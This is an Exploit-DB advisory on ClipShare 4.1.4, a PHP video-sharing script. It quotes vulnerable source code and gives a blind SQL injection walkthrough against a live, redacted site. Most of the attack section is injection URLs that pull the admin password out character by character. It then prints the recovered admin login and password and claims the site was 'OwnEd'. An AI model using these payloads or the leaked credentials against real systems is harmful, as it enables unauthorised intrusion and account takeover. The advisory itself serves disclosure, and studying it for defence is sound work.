ClipShare 4.1.4 - Multiple Vulnerabilities

EDB-ID:

24790

CVE:



Author:

AkaStep

Type:

webapps


Platform:

PHP

Date:

2013-03-15


=====================================================================
Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
Official site: http://www.clip-share.com
Software License: Commercial.
Vulns: Blind SQl injection && Plaintext Password.
======================================================================
AFAIK all versions is vulnerable:
Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273
Last Checked: 13 March 2013

NOTE:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
Vulnerable Script:
//ugroup_videos.php
=========================== BEGIN OF ugroup_videos.php =============================================
<?php
/**************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require('include/function.php');

$urlkey  = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL;
$uid  = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL;

$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1";
$rs = $conn->Execute($sql);
if($rs->recordcount()>0) {
  STemplate::assign('groupname',$rs->fields[gname]);
  //PAGING STARTS
  $page     = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL;
  $sql     = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1";
  $ars     = $conn->Execute($sql);
  $total    = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini'];
  $tpage     = ceil($total/$config['items_per_page']);
  $spage    = ( $tpage == 0 ) ? $tpage+1 : $tpage;
  $startfrom   = ($page-1)*$config['items_per_page'];
  $sql    = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page'];
  $rs    = $conn->execute($sql);
  if($rs->recordcount()>0)
    $vdo = $rs->getrows();
  $start_num  = $startfrom+1;
  $end_num  = $startfrom+$rs->recordcount();
  $page_link  = '';
  $type    = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL;
  for ( $k=1;$k<=$tpage;$k++ )
    $page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a>&nbsp;&nbsp;";
  //END PAGING
}

STemplate::assign('err',$err);
STemplate::assign('msg',$msg);
STemplate::assign('page',$page);
STemplate::assign('start_num',$start_num);
STemplate::assign('end_num',$end_num);
STemplate::assign('page_link',$page_link);
STemplate::assign('total',$total);
STemplate::assign('answers',$vdo);
STemplate::assign('head_bottom',"grouplinks.tpl");
STemplate::display('head1.tpl');
STemplate::display('err_msg.tpl');
STemplate::display('ugroup_members.tpl');
STemplate::display('footer.tpl');
STemplate::gzip_encode();
?>


====================END OF ugroup_videos.php========================
Real exploitation example:

_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3


http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3


//ON TRUE
//RETURNS: NORMAL PAGE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3

//ON FALSE
// RETURNS NOTHING.(White Page)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3




Plaintext password:
//siteadmin/login.php
============ BEGIN OF siteadmin/login.php ===========================
<?php
include('../include/config.php');

if ( isset($_POST['submit_login']) ) {
    $username   = trim($_POST['username']);
    $password   = trim($_POST['password']);

    if ( $username == '' or $password == '' ) {
        $err = 'Please provide a username and password!';
    } else {
        $access = false;
        $sql    = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'";
        $conn->execute($sql);
        if ( $conn->Affected_Rows() == 1 ) {
            $sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'";
            $conn->execute($sql);
            if ( $conn->Affected_Rows() == 1 ) {
                $access = true;
            }
        }
    // SNIP //
============ END OF siteadmin/login.php ===========================



//TRUE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3


80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3




http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3


Passi cekirik:



http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

11 simvolludur pass.


========================================================

1-ci simvol:  o

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3


========================================================
2-ci simvol:  (

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================
3-cu simvol:   2


http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

4-cu simvol:       n

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

5-ci simvol:         @

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3


========================================================

6-ci simvol:           b
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

7-ci simvol:          % (yoxla sonra)

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3


========================================================

8-ci simvol:          h

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

9-cu simvol:         a

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3


========================================================

10-cu simvol:         5

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================
11-ci simvol:   1

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3






//Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

pass: o(2n@b%ha51


http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3

login: admin
pass: o(2n@b%ha51


http://_REMOVED_/siteadmin/

OwnEd.
Tested version:
Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

=========================================
               KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us

El sallayin :D
ottoman38 & Ferid23 & Metaizm &HERO_AZE & BOT_25 &CAMOUFL4G3
4R!F * Orxan_204 &  & SEXAVET & Manifesto & J_OF_R &
& etc.
===========================================

/AkaStep